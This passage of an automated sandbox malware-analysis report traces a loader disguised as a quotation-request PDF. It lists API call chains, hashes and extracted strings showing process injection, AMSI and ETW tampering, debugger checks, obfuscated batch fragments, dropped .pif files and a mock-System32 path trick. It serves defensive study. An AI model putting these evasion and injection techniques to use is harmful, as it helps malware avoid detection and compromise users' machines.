                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029682C5
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                  • String ID: ntdll$yromeMlautriVdaeRtN
                                                                  • API String ID: 2521977463-737317276
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02967D74
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                  • API String ID: 2719805696-3542721025
                                                                  • Opcode ID: e2040e2507f4a17025422141970378afacb0087224cbee2b66dbeeef89ddb586
                                                                  • Instruction ID: fffb0edfc50bde2074c65378b462fdcf496065426a06eee8111935d7206c0760
                                                                  • Opcode Fuzzy Hash: e2040e2507f4a17025422141970378afacb0087224cbee2b66dbeeef89ddb586
                                                                  • Instruction Fuzzy Hash: D6014C74644208AFEB01EFA8EC69EFEB7EDEF88704F514850F908D7680D630A9508F64
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02968529
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                  • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                  • API String ID: 3503870465-2520021413
                                                                  • Opcode ID: 6ed333b311dd9a5c74be41dc79a947fbde2b8f4dd62e2a6aa8f0e458e6bd2fc4
                                                                  • Instruction ID: 820c19219c67943e372b30ae8c164421f73910edd3d565a47ae14283cd2236a2
                                                                  • Opcode Fuzzy Hash: 6ed333b311dd9a5c74be41dc79a947fbde2b8f4dd62e2a6aa8f0e458e6bd2fc4
                                                                  • Instruction Fuzzy Hash: 01016274644304AFEB01EFA4D865EBE77EEFB89710F914860F40497640EA30A9548F24
                                                                  APIs
                                                                  • RtlInitUnicodeString.NTDLL(?,?), ref: 0296DA6C
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DABE), ref: 0296DA82
                                                                  • NtDeleteFile.NTDLL(?), ref: 0296DAA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFileInitStringUnicode
                                                                  • String ID:
                                                                  • API String ID: 3559453722-0
                                                                  • Opcode ID: 1bfc42aa5c10025be9cadd6bab54397febd1d2cf129f487b5e4dfaf52709e80b
                                                                  • Instruction ID: 367b22b360e94043532dbff850d4c6a601633f0dcaaa175d9f79ecef8ac4dbcc
                                                                  • Opcode Fuzzy Hash: 1bfc42aa5c10025be9cadd6bab54397febd1d2cf129f487b5e4dfaf52709e80b
                                                                  • Instruction Fuzzy Hash: 4B014F75B0C248AEEB05EBA08D45BED77F9AB84704F5000A29224E6081DB75AB048B75
                                                                  APIs
                                                                    • Part of subcall function 02954ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02954EDA
                                                                  • RtlInitUnicodeString.NTDLL(?,?), ref: 0296DA6C
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DABE), ref: 0296DA82
                                                                  • NtDeleteFile.NTDLL(?), ref: 0296DAA1
                                                                    • Part of subcall function 02954C0C: SysFreeString.OLEAUT32(0296E950), ref: 02954C1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocDeleteFileFreeInitUnicode
                                                                  • String ID:
                                                                  • API String ID: 2841551397-0
                                                                  • Opcode ID: af82f23c3887c5e076a01cc8d93edcc28ab77eb4ade78e00d152185ed446785d
                                                                  • Instruction ID: 09e37c7e89510d2e7feb63776eb07831e0b8a1dd12df329646372f0fd77047fa
                                                                  • Opcode Fuzzy Hash: af82f23c3887c5e076a01cc8d93edcc28ab77eb4ade78e00d152185ed446785d
                                                                  • Instruction Fuzzy Hash: 7C01E171B4820CAADB11EAE0CD55FDEB3FDEB88704F504461A514F2180EB756B048A74
                                                                  APIs
                                                                    • Part of subcall function 02966CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02966D41,?,?,?,00000000), ref: 02966D21
                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,02966E34,00000000,00000000,02966DB3,?,00000000,02966E23), ref: 02966D9F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFromInstanceProg
                                                                  • String ID:
                                                                  • API String ID: 2151042543-0
                                                                  • Opcode ID: 6741948489ef67128e3d3155ed3cb4ed8759bd460af5d7d6f1c8b551a6c0f463
                                                                  • Instruction ID: b8975d734839662d713f122989a14a7fd685b6999f1fc900b422b40f58cef53f
                                                                  • Opcode Fuzzy Hash: 6741948489ef67128e3d3155ed3cb4ed8759bd460af5d7d6f1c8b551a6c0f463
                                                                  • Instruction Fuzzy Hash: 1601F771208704AFE706DFA4DC5687F7BEDEBC9710B524435F901D2680E6388D10C960
                                                                  APIs
                                                                  • InetIsOffline.URL(00000000,00000000,0297AFA1,?,?,?,000002F7,00000000,00000000), ref: 0296ECAE
                                                                    • Part of subcall function 02968824: LoadLibraryA.KERNEL32(00000000,00000000,0296890B), ref: 02968858
                                                                    • Part of subcall function 02968824: FreeLibrary.KERNEL32(74B30000,00000000,029B1388,Function_000065D8,00000004,029B1398,029B1388,05F5E0FF,00000040,029B139C,74B30000,00000000,00000000,00000000,00000000,0296890B), ref: 029688EB
                                                                    • Part of subcall function 0296EB94: GetModuleHandleW.KERNEL32(KernelBase,?,0296EF98,UacInitialize,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,Initialize), ref: 0296EB9A
                                                                    • Part of subcall function 0296EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0296EBAC
                                                                    • Part of subcall function 0296EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 0296EC00
                                                                    • Part of subcall function 0296EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0296EC12
                                                                    • Part of subcall function 0296EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0296EC29
                                                                    • Part of subcall function 02957E18: GetFileAttributesA.KERNEL32(00000000,?,0296F8CC,ScanString,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,UacScan,029B137C,0297AFD8,UacInitialize), ref: 02957E23
                                                                    • Part of subcall function 0295C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02AA58C8,?,0296FBFE,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession), ref: 0295C303
                                                                    • Part of subcall function 0296DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DC80), ref: 0296DBEB
                                                                    • Part of subcall function 0296DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0296DC80), ref: 0296DC1B
                                                                    • Part of subcall function 0296DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0296DC30
                                                                    • Part of subcall function 0296DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0296DC5C
                                                                    • Part of subcall function 0296DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0296DC65
                                                                    • Part of subcall function 02957E3C: GetFileAttributesA.KERNEL32(00000000,?,02972A49,ScanString,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,Initialize), ref: 02957E47
                                                                    • Part of subcall function 02957FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02972BE7,OpenSession,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,Initialize,029B137C,0297AFD8,ScanString,029B137C,0297AFD8), ref: 02957FDD
                                                                    • Part of subcall function 0296DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DB9E), ref: 0296DB0B
                                                                    • Part of subcall function 0296DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0296DB45
                                                                    • Part of subcall function 0296DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0296DB72
                                                                    • Part of subcall function 0296DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0296DB7B
                                                                    • Part of subcall function 029687A0: LoadLibraryW.KERNEL32(bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,UacScan), ref: 029687B4
                                                                    • Part of subcall function 029687A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029687CE
                                                                    • Part of subcall function 029687A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize), ref: 0296880A
                                                                    • Part of subcall function 0296870C: LoadLibraryW.KERNEL32(amsi), ref: 02968715
                                                                    • Part of subcall function 0296870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02968774
                                                                  • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,0297B330), ref: 029749B7
                                                                    • Part of subcall function 0296DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 0296DA6C
                                                                    • Part of subcall function 0296DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DABE), ref: 0296DA82
                                                                    • Part of subcall function 0296DA44: NtDeleteFile.NTDLL(?), ref: 0296DAA1
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 02974BB7
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 02974C0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                  • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                  • API String ID: 3130226682-181751239
                                                                  • Opcode ID: c7b2992acead7048061a5b0d0169ef3482993f49f1eadf7648ea0750aed11259
                                                                  • Instruction ID: a5dc9d7be7d0964a86aad147420ea63d5d3676929e16f33feb79a362ae871699
                                                                  • Opcode Fuzzy Hash: c7b2992acead7048061a5b0d0169ef3482993f49f1eadf7648ea0750aed11259
                                                                  • Instruction Fuzzy Hash: 8C24FB75B102688FDB51EF64DD90AED73F6BFC9310F2050E6E409AB254DA30AE859F90

                                                                  Control-flow Graph

call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 ResumeThread call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 CloseHandle call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2967ed4 call 29687a0 * 6 CloseHandle call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 5672->5992 5673->5672 5822->5553 5823->5822 5991->5992 5992->5463
                                                                  APIs
                                                                    • Part of subcall function 02968824: LoadLibraryA.KERNEL32(00000000,00000000,0296890B), ref: 02968858
                                                                    • Part of subcall function 02968824: FreeLibrary.KERNEL32(74B30000,00000000,029B1388,Function_000065D8,00000004,029B1398,029B1388,05F5E0FF,00000040,029B139C,74B30000,00000000,00000000,00000000,00000000,0296890B), ref: 029688EB
                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02AA57DC,02AA5820,OpenSession,029B137C,0297AFD8,UacScan,029B137C), ref: 02977E39
                                                                  • ResumeThread.KERNEL32(00000000,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,UacScan,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8), ref: 02978483
                                                                  • CloseHandle.KERNEL32(00000000,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,UacScan,029B137C,0297AFD8,00000000,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C), ref: 02978602
                                                                    • Part of subcall function 029687A0: LoadLibraryW.KERNEL32(bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,UacScan), ref: 029687B4
                                                                    • Part of subcall function 029687A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029687CE
                                                                    • Part of subcall function 029687A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize), ref: 0296880A
                                                                  • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,029B137C,0297AFD8,UacInitialize,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,UacScan,029B137C), ref: 029789F4
                                                                    • Part of subcall function 02957E18: GetFileAttributesA.KERNEL32(00000000,?,0296F8CC,ScanString,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,UacScan,029B137C,0297AFD8,UacInitialize), ref: 02957E23
                                                                    • Part of subcall function 0296DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DB9E), ref: 0296DB0B
                                                                    • Part of subcall function 0296DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0296DB45
                                                                    • Part of subcall function 0296DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0296DB72
                                                                    • Part of subcall function 0296DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0296DB7B
                                                                    • Part of subcall function 0296818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02968216), ref: 029681F8
                                                                  • ExitProcess.KERNEL32(00000000,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,Initialize,029B137C,0297AFD8,00000000,00000000,00000000,ScanString,029B137C,0297AFD8), ref: 0297AA25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
                                                                  • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                  • API String ID: 1548959583-1225450241
                                                                  • Opcode ID: 6d1d65686406e066f05fbb50d073b8c559390a68c0f086447bb478962cd7345e
                                                                  • Instruction ID: 25e6c41592e64a9ddadad36808217a3f36e728fa98fd33dbdd666589af868977
                                                                  • Opcode Fuzzy Hash: 6d1d65686406e066f05fbb50d073b8c559390a68c0f086447bb478962cd7345e
                                                                  • Instruction Fuzzy Hash: 7043D875B102688BDB61EF64DD909EE73F6FFC8314F1050E6E409AB254DA30AE859F90

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,?,02952000), ref: 029517D0
                                                                  • Sleep.KERNEL32(0000000A,00000000,?,02952000), ref: 029517E6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
